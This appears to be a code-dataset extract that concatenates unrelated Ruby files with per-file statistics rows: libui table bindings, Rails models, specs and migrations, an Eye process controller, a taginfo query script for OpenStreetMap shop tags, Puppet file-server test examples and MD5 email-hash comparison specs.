try_extern 'void uiTableAppendImageTextColumn(uiTable *t, const char *name, int imageModelColumn, int textModelColumn, int textEditableModelColumn, uiTableTextColumnOptionalParams *textParams)'
try_extern 'void uiTableAppendCheckboxColumn(uiTable *t, const char *name, int checkboxModelColumn, int checkboxEditableModelColumn)'
try_extern 'void uiTableAppendCheckboxTextColumn(uiTable *t, const char *name, int checkboxModelColumn, int checkboxEditableModelColumn, int textModelColumn, int textEditableModelColumn, uiTableTextColumnOptionalParams *textParams)'
try_extern 'void uiTableAppendProgressBarColumn(uiTable *t, const char *name, int progressModelColumn)'
try_extern 'void uiTableAppendButtonColumn(uiTable *t, const char *name, int buttonModelColumn, int buttonClickableModelColumn)'
try_extern 'uiTable *uiNewTable(uiTableParams *params)'
end
end
| 43.161667 | 236 | 0.7185 |
614af909ec26a51c6b773d9804a7b7b9eb00e44f | 266 | require 'rails_admin/config/fields/base'
module RailsAdmin
module Config
module Fields
module Types
class Inet < RailsAdmin::Config::Fields::Base
RailsAdmin::Config::Fields::Types.register(self)
end
end
end
end
end
| 19 | 58 | 0.654135 |
39c71b588af6d83cd3d74c85f0255fe6aa1f978d | 1,134 | module Eye::Process::Controller
# scheduled actions
# :update_config, :start, :stop, :restart, :unmonitor, :monitor, :break_chain, :delete, :signal, :user_command
def start
if load_external_pid_file == :ok
switch :already_running
:ok
else
start_process
end
end
def stop
stop_process
switch :unmonitoring
end
def restart
load_external_pid_file unless pid # unmonitored case
restart_process
end
def monitor
if self[:auto_start]
start
elsif load_external_pid_file == :ok
switch :already_running
else
schedule command: :unmonitor, reason: 'not found'
end
end
def unmonitor
switch :unmonitoring
end
def delete
if self[:stop_on_delete]
info 'process has stop_on_delete option, so sync-stop it first'
stop
end
remove_watchers
remove_children
remove_triggers
terminate
end
def signal(sig = 0)
send_signal(sig) if self.pid
end
def user_command(name)
if self[:user_commands] && c = self[:user_commands][name.to_sym]
execute_user_command(name, c)
end
end
end
| 18 | 112 | 0.671076 |
4a7e01b29e6bf98597fe13655b782fd0f5548fb4 | 298 | require 'rails_helper'
RSpec.describe "music_categories/show", type: :view do
before(:each) do
@music_category = assign(:music_category, MusicCategory.create!(
:name => "Name"
))
end
it "renders attributes in <p>" do
render
expect(rendered).to match(/Name/)
end
end
| 19.866667 | 68 | 0.667785 |
e89e5fc36cfc60bcb288b9f52d055234f7618529 | 277 | class ContactMessage < NonPersistentRecord
column :id, :integer
column :author, :string
column :author_email, :string
column :author_phone, :string
column :subject, :string
column :body, :string
validates_presence_of :author, :author_email, :subject, :body
end
| 23.083333 | 63 | 0.747292 |
1d6768e563fe8b7840ab8c2d4284989ad0ce16ce | 436 | require 'rails_helper'
RSpec.describe SponsorsController, type: :controller do
context 'GET #show' do
it 'returns a success response' do
sponsor = Sponsor.create!(name: "Sponsor")
get :show, params: {id: sponsor.to_param}
expect(response).to be_success
end
end
#context 'GET #index' do
# it 'returns a success response' do
# get :index
# expect(response).to be_success
#end
#end
end
| 22.947368 | 55 | 0.662844 |
e8cdecbb564610efc98c7808668054eee9f5ad00 | 166 | class AddBilinguals < ActiveRecord::Migration[5.0]
def change
add_column :leapq_sample_bilinguals, :scene, :string, :limit => 20, :default => 'school'
end
end
| 27.666667 | 91 | 0.722892 |
5dec9a82ab4c75a2c15b50a08e0bbd643fc42c3d | 2,031 | #!/usr/bin/ruby
#this script generates list of popular shop values - more than MIN_COUNT occurences in OpenStreetMap database according to taginfo
#it is useful during creating/updating list of shops displayed with generic dot icon
require 'net/http'
require 'json'
require 'pp'
MIN_COUNT = 100
EXCEPTIONS = [
"no",
"vacant",
"empty",
"disused",
"unknown",
"closed",
"fixme",
"FIXME",
"FixMe",
"other",
"*",
"winery", #see discussion in https://github.com/gravitystorm/openstreetmap-carto/pull/1632
"antique", #see https://github.com/gravitystorm/openstreetmap-carto/pull/1900
"betting", #see https://github.com/gravitystorm/openstreetmap-carto/pull/1900
"delicatessen", #see https://github.com/gravitystorm/openstreetmap-carto/pull/1900
"dive", #see https://github.com/gravitystorm/openstreetmap-carto/pull/1900
"fish", #see https://github.com/gravitystorm/openstreetmap-carto/pull/1900
"gambling", #see https://github.com/gravitystorm/openstreetmap-carto/pull/1900
"insurance", #see https://github.com/gravitystorm/openstreetmap-carto/pull/1900
"pharmacy", #see https://github.com/gravitystorm/openstreetmap-carto/pull/1900
"street_vendor", #see https://github.com/gravitystorm/openstreetmap-carto/issues/2090
"storage_rental", #see https://github.com/gravitystorm/openstreetmap-carto/issues/2090
]
url = URI.parse('http://taginfo.openstreetmap.org/api/4/key/values?key=shop&sortname=count&sortorder=desc')
req = Net::HTTP::Get.new(url.to_s)
res = Net::HTTP.start(url.host, url.port) {|http|
http.request(req)
}
data = JSON.parse(res.body)["data"]
# Get an array of values that only includes values with more than MIN_COUNT occurrences
counted = data.select { |h| h["count"] > MIN_COUNT }.map { |h| h["value"] }
# Filter out empty strings
no_empty = counted.reject { |h| h.strip.empty? }
# Filter out exceptions in EXCEPTIONS
filtered = no_empty - EXCEPTIONS
# Output in SQL style
puts "(" + filtered.map{ |val| "'#{val}'" }.sort.join(", ") + ")"
| 35.631579 | 130 | 0.71935 |
33037e551eb828e1f518c9a73d893605267ae878 | 1,427 | #!/usr/bin/env rspec
shared_examples_for "Puppet::Indirector::FileServerTerminus" do
# This only works if the shared behaviour is included before
# the 'before' block in the including context.
before do
Puppet::FileServing::Configuration.instance_variable_set(:@configuration, nil)
FileTest.stubs(:exists?).returns true
FileTest.stubs(:exists?).with(Puppet[:fileserverconfig]).returns(true)
@path = Tempfile.new("file_server_testing")
path = @path.path
@path.close!
@path = path
Dir.mkdir(@path)
File.open(File.join(@path, "myfile"), "w") { |f| f.print "my content" }
# Use a real mount, so the integration is a bit deeper.
@mount1 = Puppet::FileServing::Configuration::Mount::File.new("one")
@mount1.path = @path
@parser = stub 'parser', :changed? => false
@parser.stubs(:parse).returns("one" => @mount1)
Puppet::FileServing::Configuration::Parser.stubs(:new).returns(@parser)
# Stub out the modules terminus
@modules = mock 'modules terminus'
@request = Puppet::Indirector::Request.new(:indirection, :method, "puppet://myhost/one/myfile")
end
it "should use the file server configuration to find files" do
@modules.stubs(:find).returns(nil)
@terminus.indirection.stubs(:terminus).with(:modules).returns(@modules)
path = File.join(@path, "myfile")
@terminus.find(@request).should be_instance_of(@test_class)
end
end
| 33.97619 | 99 | 0.693763 |
f884335ef55dae495d6fe156acbde79e0a89760e | 1,491 | require 'digest'
RSpec.describe HashComparator::Emails::Analyzer do
let(:subject_plaintext_emails) { ['[email protected]', '[email protected]', '[email protected]'] }
let(:target_hashed_emails) { [hashed_email1, hashed_email2] }
let(:options) { { parsing: { remove_usernames: true } } }
let(:hashed_email1) { Digest::MD5.hexdigest('hello.inc') }
let(:hashed_email2) { Digest::MD5.hexdigest('yahoo.com') }
describe '#find_common_plaintext' do
subject { described_class.find_common_plaintext(hash_function: :md5, subject_plaintext_emails: subject_plaintext_emails, target_hashed_emails: target_hashed_emails, options: options) }
it 'returns the matches in plaintext format' do
expect(subject).to eq ['hello.inc']
end
end
describe '#find_common_hashes' do
subject { described_class.find_common_hashes(hash_function: :md5, subject_plaintext_emails: subject_plaintext_emails, target_hashed_emails: target_hashed_emails, options: options) }
it 'returns the matches in hashed format' do
expect(subject).to eq [hashed_email1]
end
end
describe '#find_full_results' do
subject { described_class.find_full_results(hash_function: :md5, subject_plaintext_emails: subject_plaintext_emails, target_hashed_emails: target_hashed_emails, options: options) }
it 'returns the matches in hashed and plaintext format' do
expect(subject).to eq(common_hashed_emails: [hashed_email1], common_plaintext_emails: ['hello.inc'])
end
end
end | 45.181818 | 188 | 0.760563 |
289df6d14662f98c85245ff952a91872cce47f37 | 466 | class CreateUnitGroupsResources < ActiveRecord::Migration[5.2]
def change
create_table :unit_groups_resources do |t|
t.integer :unit_group_id
t.integer :resource_id
t.index [:unit_group_id, :resource_id], unique: true
t.index [:resource_id, :unit_group_id]
end
reversible do |dir|
dir.up do
execute "ALTER TABLE scripts_resources CONVERT TO CHARACTER SET utf8 COLLATE utf8_unicode_ci"
end
end
end
end
| 27.411765 | 101 | 0.699571 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.